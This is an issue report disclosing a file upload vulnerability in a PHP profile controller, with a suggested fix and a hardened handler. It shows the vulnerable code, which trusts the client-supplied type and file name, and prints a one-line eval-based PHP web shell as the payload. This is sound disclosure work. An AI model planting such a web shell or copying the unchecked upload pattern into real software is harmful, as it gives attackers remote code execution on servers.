There is a file upload vulnerability that allows attackers to upload PHP backdoor files #4

Open
FStac opened this Issue Oct 30, 2018 · 0 comments


FStac commented Oct 30, 2018

Vulnerable code at \app\Http\Controllers\Backend\ProfileController.php, starting at line 21:

```php
// "type" is the Content-Type value sent by the client in the upload request
if ((($_FILES["avatar"]["type"] == "image/png")
    || ($_FILES["avatar"]["type"] == "image/jpeg")
    || ($_FILES["avatar"]["type"] == "image/pjpeg"))
    && ($_FILES["avatar"]["size"] < 1000000)) {
    if ($_FILES["avatar"]["error"] > 0) {
        return 1;
    } else {
        // the client-supplied file name, extension included, becomes the stored name
        move_uploaded_file($_FILES["avatar"]["tmp_name"], 'uploads/' . $_FILES["avatar"]["name"]);
        $data = [
            'avatar' => "http://leslie.net.cn/uploads/" . $_FILES["avatar"]["name"],
        ];
```

The program uses some unreliable functions to judge whether it is a picture file or not.
**Attackers can modify file attributes and content-type by truncating data.**
PAYLOAD:

```php
<?php @eval($_POST[value]);?>
```

Fix suggestion:
1. Use in_array() or "===" to compare against the file extension name.
2. Rename files when saving them. The naming rule for file names uses a timestamp spliced with the MD5 value of random numbers (md5(time()+rand(1,10000))).
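
A hardened version of the handler along the lines of the fix suggestions above, as an added example that is not part of the original issue or the project's code; the function name `store_avatar`, the `$destDir` parameter and the null-on-failure convention are assumptions. It goes beyond the two suggestions by checking the file content with `finfo` and `getimagesize()` and by generating the name with `random_bytes()` instead of `md5(time()+rand(1,10000))`.

```php
<?php
// Added example. store_avatar(), $destDir and the return convention are
// hypothetical names chosen for illustration, not the project's API.

const ALLOWED_IMAGE_TYPES = [   // server-detected MIME type => extension we assign
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
];

/**
 * Validate and store an uploaded avatar.
 * $file is one entry of $_FILES, e.g. $_FILES['avatar'].
 * Returns the stored file name, or null if the upload is rejected.
 */
function store_avatar(array $file, string $destDir): ?string
{
    // Reject failed uploads and paths that did not come from an HTTP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if ($file['size'] >= 1000000) {   // same size limit as the original check
        return null;
    }
    // Suggestion 1: strict allowlist comparison on the extension of the client name.
    $clientExt = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($clientExt, ['png', 'jpg', 'jpeg'], true)) {
        return null;
    }
    // Detect the type from the bytes on disk; $file['type'] is client-supplied.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = ALLOWED_IMAGE_TYPES[$mime] ?? null;
    if ($ext === null || getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Suggestion 2: server-generated name. random_bytes() replaces
    // md5(time()+rand(1,10000)) so the stored name cannot be predicted.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        return null;
    }
    return $name;   // the client file name never reaches the filesystem
}
```

Serving the upload directory from a location the web server does not hand to the PHP interpreter limits the impact if one of these checks is bypassed.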
